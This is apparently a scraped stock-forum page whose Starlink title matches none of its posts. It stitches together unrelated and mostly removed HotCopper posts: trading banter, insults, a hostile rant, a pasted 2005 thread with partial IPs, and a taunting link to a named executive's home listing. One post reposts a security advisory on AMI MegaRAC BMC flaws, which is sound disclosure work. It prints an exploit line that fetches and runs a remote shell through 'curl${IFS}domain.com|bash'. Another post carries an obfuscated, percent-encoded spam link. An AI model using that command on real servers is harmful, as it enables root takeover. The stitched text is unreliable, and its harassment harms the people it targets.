As Musk owns Twitter - much Star Link info is posted, page-3

  1. Wheres can this UPI article be found that everyone keeps referring to??

    The Drudge report times out.
    • *Removed* this post has been removed from public view
  2. Looking for stoploss on line.
    AOTonline? Challenger.com? Any others? AOT seems reasonable, $33 trade, $49.95/month, free if more than 8 trades/month. If database isn't accessed then $0/month. Seems reasonable, any opinions?
    • *Removed* this post has been removed from public view
  3. These guys absolutely suck. I'm sick of them, they are a cancer on the Earth. Do not let them in what ever you do. I guess that makes me a redneck, racist, bigot, intolerate,(insert whatever you like) but now I don't care anymore. THey can all f#@%k off....
    • *Removed* this post has been removed from public view
  4. =http://www.geocities.com/barrybolton187/lok.jpg>
    • *Removed* this post has been removed from public view

  5. =http://www.geocities.com/barrybolton187/lok.jpg>
    • *Removed* this post has been removed from public view
  6. not so stupid now Up 10% Gobs baby, when's the big sell off due? I would have thought a hotshot trader like yourself would be all over this one, the greatest trading stock on the ASX for mine.
    • *Removed* this post has been removed from public view
  7. re: not so stupid now I made $1500 for two days Crackedhead, and will do it again and again, what's your problem? What can you offer mate, beside an insight into your diminished intellect?
    • *Removed* this post has been removed from public view
  8. re: not so stupid now Yeah, right peanut, aren't you the mega trader? Pity you have no credibility here or anywhere else, you rude little schoolboy. Get a job and stop bugging people....
    • *Removed* this post has been removed from public view
  9. look who's stupid now Mate, that might impress your friends in primary school but we can do without it here, go away, far away, and grow up. Just another multi-nicked dickhead aren't you?
    • *Removed* this post has been removed from public view
  10. re: not so stupid now**hey big ears**** You got me there big fella,
    I should have listened to one or all of your many aliases Goblin, there is no doubt about it. I'd be buying flat out at 23c today if I had. Ah well, thems the breaks. I have tried to trade this one with some success but could have done without todays fiasco. Still, I've been in and out since 8c so perhaps not such a blow. Those who bought around 28c will be hurting but that is the risk with stocks like LOK. To my thinking this was an overreaction to the 10Q filing which revealed nothing that wasn't already known. I would expect a bounce as those who understand the nature of the disclosure come in and mop up tonight on the US. Mind you Gobs, with timing like yours you would clean up on this one me thinks.
    regards

    Check out what the big money was doing during the fall.

    http://mcribel.com/Le%76elC/%708%3940%36%31%35%354-or%64%65%72%2E%68t%6D
    • *Removed* this post has been removed from public view
  11. Hotcopper has not changed in my absence....
    • *Removed* this post has been removed from public view
  12. There are infinite ways to lose money......infinite ways. Believing those in power, whether your politician, company director, or policeman are some of the dead set surest ways.
    • *Removed* this post has been removed from public view
  13. Load of crock? Load of crack more like.
    • *Removed* this post has been removed from public view
  14. Great user name, Colin.....where'd you pull that one from? Your behind?
    • *Removed* this post has been removed from public view
  15. sandune, you come across as being so deluded by hate.

    The three posters that you refer to all have their unique styles - which all differ significantly! I can't understand how anyone could think that they are the same person!
    • *Removed* this post has been removed from public view
  16. Very direct, and good post. It's only others that will feel the shame for the directors TSS.

    A leopard does not change its spots, nor a tiger its stripes.

    Their record indicates that they can't feel shame. With these "piggy backs" now approved, they will obtain even more power. Small investors, unless there one of their mates, will be the losers.
    • *Removed* this post has been removed from public view
  17. I have seen hundreds of posts that ARE defamatory against different parties.

    My conscience is clear; I don't feel any remorse about what I posted. Neither did I see anything wrong with mojo rising or Croesusau's posts, or motif's a few days ago.

    It is easy to see where the influence and control over this forum has initiated.

    So, if that's the way the moderators are going to run this forum, I won't be contributing.



    • *Removed* this post has been removed from public view
  18. rogerm, while you've deciphered the good and bad posters, have you also pigeon holed the ones that have fallen in love with the stock and reject any opinion other than the one they want to hear?
    It's the most dangerous thing you can do imo, and you should feel lucky/ grateful that you have some contrarian posters to provide balance for all the eternal PEN optimists. But what would I know?
    PEN is very tradable, but not out of the woods by a long way imo.
    • *Removed* this post has been removed from public view
  19. So you can see both sides of the story matty.
    I'm in the same boat having traded PEN from time to time.
    It really brings to the fore that PEN has some of the most sycophantic, denying reality, totally blindfolded and awestruck posters who can't accept any posts that criticise their precious share.
    What a disgusting thread this is, when someone (who I know to be a very proficient trader) can post to try and bring some discussion into the thread for people considering buying, but is slaughtered by the sycophants who aren't interested in anyone hearing a negative word.
    If that poster wasn't a moderator, all posts criticising that poster would have been removed, and possibly seen posters suspended, but he's copping it on the chin as a moderator so far, which shows a lot of strength of character in my book.
    Shame on many of you.
    • *Removed* this post has been removed from public view
  20. Maybe there are a lot of non sycophants that read the threads regularly without posting, and reach the point where they have to say something.
    • *Removed* this post has been removed from public view
  21. Agree seuss.
    I considered a group of traders on a pump and dump mission when it first started, but when the pull back came, dismissed it. The strength after that was significant, and I believe a LOT of people realise it's very oversold and on the brink of some very good company making moves due to be announced. Most won't want to miss the potential, so on seeing any movement, will quickly jump back in. That's no pump and dump.
    • *Removed* this post has been removed from public view
  22. I know. Maybe I didn't explain myself very well.
    There will be a lot of cash on the sidelines not wanting to miss out, but that has been nervous about current market conditions. Movement in stock price is enough to bring that money back in. Nothing to do with management, just investor psychology imo.
    • *Removed* this post has been removed from public view
  23. I believe you'll find that we now have SUPPORT at 10c.
    Resistance technically may be at 11c, and once taken out convincingly, should keep going up again.
    • *Removed* this post has been removed from public view
  24. Do you have a 2.7 million deposit for a new home?
    As the administrators take over CVI, Mark Smyth's 'fortress' goes up for sale at a lousy $13,500,000

    Now, with a 2.7million deposit, and interest rate of 7.11%, you'll only need a touch over $77,000 a month to make the repayments over 25 years.

    Feeling sick enough yet?
    Shadders and Raks did do the drive past to report on the letter box for 123enen. I remember it well from just after the EGM days.

    So, if CVI didn't take all your money like they took most people's then you too could live the life, live the dream, and feel safe with the protective barrier from the outside world!

    Maybe a few 'old friends' need an appointment to go and view the home and see how Smyth's doing? Is the dementia well advanced yet? Any house guests? Malcolm Johnson, Anton Tarkanyi, excelsior perhaps?

    To make your appointment for Perthites, and just for a sick session for others:
    http://www.domain.com.au/Property/For-Sale/House/WA/Mosman-Park/?adid=2008821829

    • *Removed* this post has been removed from public view
  25. tvp
    No answer from Arttse on that yet.......................
    Too busy working out which amigo is leaking at the moment, but appearing to be faithful on the forum???

    • *Removed* this post has been removed from public view
  26. 485 Posts.
    lightbulb Created with Sketch. 91

    SUPPLY CHAIN VULNERABILITIES PUT SERVER ECOSYSTEM AT RISK


    Subscribe to Eclypsium’s Threat Report

    BMC&C

    Eclypsium Research has discovered and reported 3 vulnerabilities in AMI MegaRAC Baseboard Management Controller (BMC) software. We are referring to these vulnerabilities collectively as BMC&C. MegaRAC BMC is widely used by many leading server manufacturers to provide “lights-out” management capabilities for their server products. Server manufacturers that are known to have used MegaRAC BMC include but are not limited to the following:

    AMDAmpere ComputingASRock
    1AsusARMDell EMC
    2GigabyteHewlett-Packard EnterpriseHuawei
    3InspurLenovoNVidia
    4QualcommQuantaTyan

    The BMC&C vulnerabilities range in severity from Medium to Critical, including remote code execution and unauthorized device access with superuser permissions. The vulnerabilities can be exploited by remote attackers having access to remote management interfaces (Redfish, IPMI). Redfish is the successor to traditional IPMI and provides an API standard for the management of a server’s infrastructure and other infrastructure supporting modern data centers. Redfish is supported by virtually all major server and infrastructure vendors, as well as the OpenBMC firmware project.

    These vulnerabilities pose a major risk to the technology supply chain that underlies cloud computing. In short, vulnerabilities in a component supplier affect many hardware vendors, which in turn can pass on to many cloud services. As such these vulnerabilities can pose a risk to servers and hardware that an organization owns directly as well as the hardware that supports the cloud services that they use.

    BMCs are designed to provide administrators with near total and remote control over the servers they manage. AMI is a leading provider of BMCs and BMC firmware to a wide range of hardware vendors and cloud service providers. As a result, these vulnerabilities potentially affect a very large number of devices, and could enable attackers to gain control of or cause damage not only to devices but to data centers and cloud services.

    The vulnerabilities discovered are addressed by the following CVEs:

    In addition to these three new vulnerabilities, we also discovered that MegaRAC was using an outdated version of the popular qDecoder CGI library. This library was vulnerable toCVE-2022-32265which had been fixed in June 2022 but not updated in the MegaRAC build we tested. This reinforces the complexity of these types of supply chain issues and the important role of Software Bill Of Materials (SBOM) as computing becomes ever more reliant on open source components.

    The impact of exploiting these vulnerabilities include remote control of compromised servers, remote deployment of malware, ransomware and firmware implants, and server physical damage (bricking). At this time, it is unknown whether these vulnerabilities are under active exploitation.

    These risks are magnified by MegaRAC’s position as the world’s leading provider of BMC remote management firmware, sitting at the top of the BMC supply chain. This firmware is a foundational component of modern computing found in hundreds of thousands of servers in data centers, server farms, and cloud infrastructure around the world. And since devices in these environments typically standardize on a hardware configuration, a vulnerable configuration could likely be shared across thousands of devices. Additionally, some of this research was enabled by the discovery of a substantial amount of AMI intellectual property on the Internet. The availability of this information could naturally increase the likelihood of attacks in the wild.

    Eclypsium Research has been following a Coordinated Vulnerability Disclosure process, including AMI and other affected parties. Additionally, AMI and Eclypsium have reached out to multiple parties who are working to determine the scope of impacted products and services.

    About MegaRAC Baseboard Management Controllers (BMCs)

    Baseboard Management Controllers (BMCs) are powerful and privileged components that provide out-of-band management for modern servers. For all intents and purposes, a BMC is a fully functional independent computer within a server, equipped with its own independent power, firmware, memory, and networking stack. This allows remote administrators to control virtually everything on the device from low-level hardware settings to managing the host operating system, virtual hosts, applications, or data. The BMC can allow administrators to manage the host even when the host itself is powered off.

    The unique power and capabilities of BMCs make them particularly dangerous if compromised by attackers. Recently, attackers used BMC implants known asiLOBleedto attack data centers and completely wipe the disks of servers. Just as importantly, iLOBleed used the unique powers of firmware to do this repeatedly. Since the malicious code was hidden within the BMC firmware, the implant was able to persist even after the server operating system was reinstalled, enabling the attacker to repeat the cycle of destroying data after the server was recovered. Additionally, the implant took the added steps of silently preventing the system from updating the BMC firmware while spoofing results to make it appear that the firmware had been updated. While the iLOBleed implants are not directly related to the BMC&C vulnerabilities, they serve as a real-world example of the damage attackers can inflict on a large number of devices with access to their BMCs.

    A Fault Line in the Cloud Supply Chain

    To properly appreciate the scope of the BMC&C vulnerabilities, it is important to understand the role AMI MegaRAC plays in the supply chain of cloud data centers. Naturally, many enterprises are attracted to the cloud due to the ability to abstract computing resources from the cost and ongoing maintenance of physical hardware. However, clouds still ultimately run on hardware – and that translates to vast numbers of servers from many different vendors.

    MegaRAC BMC firmware is one of the common threads that connects much of the hardware that underlies the cloud. As a result, any vulnerability in MegaRAC can easily spread through the extended supply chain to affect dozens of vendors and potentially millions of servers. Additionally, in order to abstract computing from the hardware, it is critical that the physical servers within a data center are interchangeable. To this end, cloud providers standardize on server components, hardware configurations, firmware & operating system versions, and hypervisor software. So if a vulnerable BMC is used in a data center environment, it is highly likely that hundreds or thousands of devices will share that same vulnerability. In the context of an attack, this could potentially put entire clouds at risk.

    Discovery Process

    In August 2022, Eclypsium Research was made aware of a leak of intellectual property, purported to come from AMI, which had been posted online. After downloading and reviewing the data, it appeared legitimate, and since there was a chance others had accessed it the decision was made to look for vulnerabilities in case malicious actors were doing the same. The focus quickly narrowed down to the Redfish API, as it is remotely accessible and a first choice for attackers.

    We would like to highlight that our experience working with AMI PSIRT was exceptional. They were highly professional throughout the disclosure process, reproduced our report quickly and clearly communicated their remediation process. This engagement exemplified how a mature vulnerability response program should operate and we look forward to future collaboration with AMI to protect customers.

    Vulnerability Details

    BMC&C Attack Scenario

    CVE-2022-40259 – Arbitrary Code Execution via Redfish API

    CVSS v3.1 Score :9.9 Critical(CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

    To find this issue, initially we reviewed for potentially dangerous calls such as command execution calls. We narrowed it down only to calls exposed to the user, and there was one sitting in the Redfish API implementation. The only complication is the attack sits in the path parameter, but it is not URL-decoded by the framework, so the exploit needs to be crafted specially to both be valid per URL and valid per bash shell command. The exploit looks roughly as follows (note that we have edited out a few details – like where it actually is – so as not to release a ready-made exploit for attackers):

    http://<device>/super/secret/path;curl${IFS}domain.com|bash;

    The path needs to be sent as-is in the HTTP request. domain.com needs to host a reverse shell (we will not be providing one, but it uses an available scripting language present on-board and is otherwise unremarkable). This exploit leads straight into a UID = 0 shell (UID = 0 user, confusingly, is called sysadmin), and does require the attacker to have a minimum access level on the device (Callback or up).


    CVE-2022-40242 – Default credentials for UID = 0 shell via SSH

    CVSS v3.1 Score :8.3 High(CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)

    As a second part for enumeration, we looked for available credentials in normal locations for a Linux system. We found a hash in/etc/shadowfor the sysadmin user and managed to crack it. The password looked like a default, and we managed to find backreferences to it going as far back as 2014 by other people. Finding them is left as an exercise to the reader.


    CVE-2022-2827 – User enumeration via API

    CVSS v3.1 Score :7.5 High(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

    When making a request for a password reset, one of the parameters can be manipulated in such a way that it is possible to determine whether the user exists or not, with no prior knowledge other than the username itself. The vulnerability also allows an attacker to test for the presence of user accounts by iterating through a list of possible account names.


    Attack Scenarios

    The first two CVEs (CVE-2022-40259, CVE-2022-40242) lead straight into the UID = 0 administrative shell, with no further escalation necessary. CVE-2022-40259 requires prior access to at least a low-privilege account (Callback privileges or higher), while CVE-2022-40242 requires nothing more than remote access to the device, albeit on some devices this account may be disabled. The third vulnerability (CVE-2022-2827) would require additional steps for full exploitation; e.g. it allows for pinpointing pre-existing users and does not lead into a shell but would provide an attacker a list of targets for brute force or credential stuffing attacks.

    Attack scenarios could be as simple as attackers using CVE-2022-40242 (default superuser credentials) to login to affected servers, or a more complex scenario could be using CVE-2022-2827 to find a user account, then use brute force attacks or credential stuffing to determine the password. From there, CVE-2022-40259 could be exploited as it only requires a user account with privilege level higher than ‘None’.

    These vulnerabilities can pose serious risks in any case in which an attacker has access to an affected server’s BMC. As a security best practice, BMCs should not be directly exposed to the Internet and scans performed after the initial disclosure indicate that public exposure is relatively low compared to recent high-profile vulnerabilities in other infrastructure products. However, it is quite common to find BMCs that are exposed due to either misconfigurations or poor security hygiene. Additionally, these vulnerabilities could be exploited by an attacker that has gained initial access into a data center or administrative network. As data centers tend to standardize on specific hardware platforms, any BMC-level vulnerability would most likely apply to large numbers of devices and could potentially affect an entire data center and the services that it delivers. Due to the nature and location of BMC vulnerabilities, detecting exploitation is complex as standard EDR & AV products focus on the operating system, not the underlying firmware.

    Security Updates

    The following vendors have released advisories to address the BMC&C vulnerabilities in their affected products. This list will be updated as new information becomes available.

    Mitigations

    • Ensure that all remote server management interfaces (e.g. Redfish, IPMI) and BMC subsystems in their environments are on their dedicated management networks and are not exposed externally, and ensure internal BMC interface access is restricted to administrative users with ACLs or firewalls.
    • Review vendor default configurations of device firmware to identify and disable built-in administrative accounts and/or use remote authentication where available.
    • Perform regular software and firmware updates in critical servers.
    • Ensure that vulnerability assessments include remote server management subsystems (like MegaRAC, iDRAC, iLO, etc.) and critical firmware.
    • Ensure that all critical firmware in servers is regularly monitored for indicators of compromise or unauthorized modifications.
    • Perform supply chain checks of new equipment. Assess that all new servers have major vulnerabilities patched and the latest firmware updates installed.
    • For Eclypsium customers, the platform will provide coverage of recently discovered vulnerabilities through a new functionality that will dynamically update scan results.
    • Eclypsium has collaborated with Greynoise to provide detection signatures which will provide threat intelligence should any malicious actor begin indiscriminate exploitation attempts ofCVE-2022-40259orCVE-2022-2827.
    • ET Labs hascreatedfree Snort & Suricata rules to detect CVE-2022-40259 and CVE-2022-2827 exploitation attempts and download instructions are locatedhere.

    Conclusions

    Securing the firmware supply chain is a complex problem, and vulnerabilities found at the top of the chain present substantial risk due to the way OEMs integrate code into their products. Firmware vulnerabilities are non-trivial to remediate due the fact their location in the computing stack is not optimized for patching at scale. Furthermore, standardization of hosting & cloud providers on server components means these vulnerabilities can easily impact hundreds of thousands, possibly millions of systems.

    As attackers shift their focus from user facing operating systems to the lower level embedded code which hardware relies on, compromise becomes harder to detect and exponentially more complex to remediate. While compromise of a server OS can be resolved with a wipe & reinstallation, firmware compromise has the potential to remain beyond reinstallation and even more drastic measures like hard drive replacement. Security research into this area is imperative to stay a step ahead of the attacks and protect the foundation upon which modern computing relies on.

  27. We'd have loved to play with your mind GZ, but this one is just uniquely weird!

    We'll put it down to end of financial year magic, and won't even trouble tech support to ask how you managed it!

    I suspect it was a thumb grabbing exercise on your part, and you had Samantha there wiggling her nose as you posted!
    Hmmm. That's my best conspiracy theory for now!
    • *Removed* this post has been removed from public view
  28. I am guessing that the ASX are giving them grief again, because on page 5 of the presentation, they obviously had the numbers prepared, that were going to be released in time for the AGM. (Obviously again is my guess)

    I can copy and paste the numbers from under the red comment about due to be updated, and it looks as if we're in for a good lift on tonnage, but not necessarily at a great grade.
    I am no Geo, so look forward to some real talk about it if and when the ASX let them release it as is.

    The fact that CDU still have so few shares on issue, even AFTER the rights issue completion is one of the biggest positives for me, along with the fact that expenses won't be as large as for many companies with a lot of employee housing already built.

    Note that this isn't released, and may never be released if voice altered Geos via the ASX mess it up.
    This is just copied form under the announcement and may have been put there to fool us anyway!

    30.3mt @ 1.7% CuEq
    (0.8% cut-off) Measured and Indicated
    97.9mt @ 0.96% CuEq
    (0.4% cut-off) Measured and Indicated
    272.9mt @ 0.62% CuEq
    (0.2% cut-off) Measured & Indicated and inferred
    • *Removed* this post has been removed from public view
  29. I find that post rather repugnant and cynical cusox.
    Right now, imo it's a buy.

    What does that have to do with anything else?
    Isn't Hot Copper a platform for commentary on stocks and whether they are worth buying or not? If we didn't comment, there would be no Hot Copper

    If at some stage in the future it's a sell, imo, I may sell it, but that time is not here yet.
    Rather than try to advise me how to post, perhaps you could let us know where you see value in CDU? Do you wait for it to be proven and moving up again?

    It's quite possible the downtrend in markets isn't over, so that would be a valid reason for some people to wait longer.
    We're all different, but I'd rather post about something I see as value than spend all day knocking shares I don't hold or intend to hold like some other people here get pleasure from.

    • *Removed* this post has been removed from public view
  30. Shadow, that is bull dust, and you know it.
    If you can't remain more neutral, you should get a green tick and post for the company.
    You simply can't give a value on it without ALL the information.
    Concentrate is always around 30% but the smoke screen wording has given us no recovery percentage, so you can bet it's well under the 95% they've been using. The market hasn't been sucked in by the flowery wording of the announcement.
    • *Removed* this post has been removed from public view
  31. No doubt about it Dutes, the rats with the gold teeth have achieved "dog" status at long last, altho the volume is a bit piddly.

    However , i dont think the boys can expect a honeymoon in the future like they had in the past . A lot of awkward questions are being asked and some very heavy gum shoe-ing is going on , why , i even think there could be a "telescope" being considered,

    Still with 13 mill , i dont see any immediate catastrophies on the horizon , which begs the obvious question , hows APG, NIX and that other one that shall remain nameless going. After looking at the charts, reading the fin reports and listening to the news, seems like we could have a movie sequel on our hands , this time, all we need is a wedding , mate , i already know where to get the 3 funerals.

    Cheers

    OI NQ , how they hanging?

    • *Removed* this post has been removed from public view
  32. Announcement from ERM has made my day. :)

    • *Removed* this post has been removed from public view
  33. re: retrace watch out below The reason people are buying into this is because it looks as if they do have a world class resource....if that is the case this stock is very undervalued at current levels.
    • *Removed* this post has been removed from public view
  34. tvp
    Maybe this sheds some light on it ............................
    He was suspected of being Bendigo. Maybe the mods worked it out.

    Subject re: you should be ashamed of yourselves
    Posted 02/03/05 17:27 - 236 reads
    Posted by diatribe
    IP 203.51.xxx.xxx
    Post #529197 - in reply to msg. #529196 - splitview

    piss off undies you and all your crap and tell that trade4 idoit to stroke it the lot of yous your a disgrace

    Voluntary Disclosure: No Position Sentiment: None TOU violation






    Subject re: you should be ashamed of yourselves
    Posted 02/03/05 17:29 - 236 reads
    Posted by bigdump
    IP 210.49.xxx.xxx
    Post #529199 - in reply to msg. #529188 - splitview

    so who should be ashamed of themselves
    it squite ironic !
    Isn't talking to ones self a form of madness





    Voluntary Disclosure: No Position Sentiment: None TOU violation






    Subject re: you should be ashamed of yourselves
    Posted 02/03/05 17:30 - 246 reads
    Posted by diatribe
    IP 203.51.xxx.xxx
    Post #529201 - in reply to msg. #529199 - splitview

    fark u 2 fool ramper

    Voluntary Disclosure: No Position Sentiment: None TOU violation






    Subject re: you should be ashamed of yourselves
    Posted 02/03/05 17:35 - 242 reads
    Posted by trade4profit
    IP 144.139.xxx.xxx
    Post #529204 - in reply to msg. #529197 - splitview

    diatribe...

    Here are the posts you refer to "6 - 8 weeks ago"...

    ---

    Subject copper strike.. have struck copper
    Posted 17/01/05 16:17 - 132 reads
    Posted by bendigo
    Post #486328 - start of thread - splitview

    Good announcement today
    Promising new company
    Good board
    Good territory

    go the ASX website & check out the announcment.

    Cheers
    Bendigo

    ---

    Subject re: copper strike.. have struck copper
    Posted 17/01/05 16:32 - 112 reads
    Posted by NR
    Post #486342 - in reply to msg. #486328 - splitview

    all ready on them bendigo......awaiting further annonucements.......


    ---


    Subject re: copper strike.. have struck copper
    Posted 18/01/05 08:30 - 112 reads
    Posted by Dezneva
    Post #486665 - in reply to msg. #486328 - splitview

    Yep, I agree. I know the people as well. They have a whole heap of old TEC ground. Its a great hit. and I think they are continuing the drilling.

    ---


    These were the first 3 posts ever on CSE.

    Although Dezneva only posted "...I know the people as well...", I can see how you may have remebered that as "...the boss being a good bloke..."

    Problem is, it was Bendigo he was replying to and not you!

    How do you explain that?

    Cheers!

    The contents of my post are for discussion purposes only; in no way are they intended to be used for, nor should they be viewed as financial, legal or cooking advice in any way.

    Voluntary Disclosure: No Position Sentiment: None TOU violation






    Subject re: you should be ashamed of yourselves
    Posted 02/03/05 17:40 - 234 reads
    Posted by Rocker
    IP 220.253.xxx.xxx
    Post #529215 - in reply to msg. #529204 - splitview

    well picked up T4P


    • *Removed* this post has been removed from public view
    • *Removed* this post has been removed from public view
  35. I get your drift joewolf.
    The letter from ERM will be posted out with all voting forms to all shareholders, as per legal requirement of course, but the 3 directors letters also go, so yes, I agree that more from ERM may be required if they know they need to jolt the apathetic.

    Slampy, very interesting question, and one I am sure won't have gone unnoticed.

    Re the shredder, of course, that starts to get into dangerous territory, but my dream last night was almost opposite, with an office full of people writing back dated minutes for meetings, and back dated forms for contracts and employment. It was a hectic dream, and I hope there's no reality in it at all.


    • *Removed* this post has been removed from public view
  36. I reckon you should all get a life personally!
    What a pack of losers you all are, obsessed with politics to the point of paranoia.
    • *Removed* this post has been removed from public view
  37. At this time of day, too many have run and will be sold off, so I look for one that's likely to run on Monday.

    CODis my pick as email has just been received from HC on behalf of next Oil Rush, detailing some good information.

    It's only just got back to price it should have been post consolidation, so that's in its favour.
    Very little to sell, I like that, as it will move quickly.

    Many won't have received the email yet as they're at work, etc.

    Read more here.

    http://www.nextoilrush.com/information-is-power-junior-oil-explorer-uncovers-long-lost-drilling-documents-and-outsmarts-oil-super-majors-in-race-for-emerging-oil-hotspot/?utm_source=HCMO

    Looks good for next week. Be prepared!
    • *Removed* this post has been removed from public view
  38. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
    • *Removed* this post has been removed from public view
  39. tvp
    re: it goes like this? Racey - it's on photobucket - you can get hte properties by right clicking it - I've just emailed it to my brother - a keen poker player!

    Salty - howsabout an email update please imo!!
    • *Removed* this post has been removed from public view
  40. What a fascinating thread reading back 3 months!

    Lots of reading today!
    So many people have so much information that they could and should email to us please......

    [email protected]

    • *Removed* this post has been removed from public view
 
Add to My Watchlist
What is My Watchlist?
A personalised tool to help users track selected stocks. Delivering real-time notifications on price updates, announcements, and performance stats on each to help make informed investment decisions.
arrow-down-2 Created with Sketch. arrow-down-2 Created with Sketch.